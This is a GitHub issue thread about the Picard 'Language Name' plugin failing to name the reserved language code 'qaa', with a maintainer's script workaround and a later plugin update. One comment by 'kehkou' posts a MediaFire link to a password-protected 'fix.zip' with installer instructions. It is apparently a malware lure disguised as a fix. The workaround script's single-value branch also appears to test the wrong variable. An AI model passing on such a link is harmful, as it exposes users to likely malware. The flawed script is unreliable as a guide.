### ISSUE TITLE
Language Name doesn't support "Artificial (Other)" (qaa)

### ISSUE THREAD

**Issue by UltimateRiff** [rdswift/picard-plugins#10]
when trying to tag [this song](https://musicbrainz.org/recording/2eba4e39-ea2e-414b-8ad9-067f8f0a1ae4), the plugin is returning "unknown" instead of "Artificial" or anything similar

here's the script, if that's important (I have made a few minor changes)
```
$noop( This should work for both normal tags and multi-value tags
       because it checks and processes differently for each. )
$if($is_multi(%language%),
    $setmulti(language,$map(%language%,$language_name(%_loop_value%))),
    $if($eq(%language%,missing),,$set(language,$language_name(%language%)))
)
```

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rdswift** [comment]
That's because language code "qaa" is not set to a specific language in the ISO 639 standard, but is listed as "Reserved for local use".  You can accommodate this manually by changing the script to:

```
$noop( This should work for both normal tags and multi-value tags
       because it checks and processes differently for each. )
$if($is_multi(%language%),
    $setmulti(language,$map(%language%,$if($eq(%_loop_value%,qaa),Artificial,$language_name(%_loop_value%)))),
    $if($eq(%language%,missing),,$set(language,$if($eq(%_loop_value%,qaa),Artificial,$language_name(%language%))))
)
```

**Comment by UltimateRiff** [comment]
I figured since MusicBrainz and Picard use qaa for Artificial, it might make sense to support it in this Picard plugin, but I think I'm fine with a workaround~

**Comment by rdswift** [comment]
> I figured since MusicBrainz and Picard use qaa for Artificial, it might make sense to support it in this Picard plugin

Good point.  It should be easy enough to add.

**Comment by rdswift** [comment]
Okay, I've updated the plugin.  It can be downloaded from [the repository](https://github.com/rdswift/picard-plugins/raw/2.0_RDS_Plugins/plugins/language_name/language_name.zip).
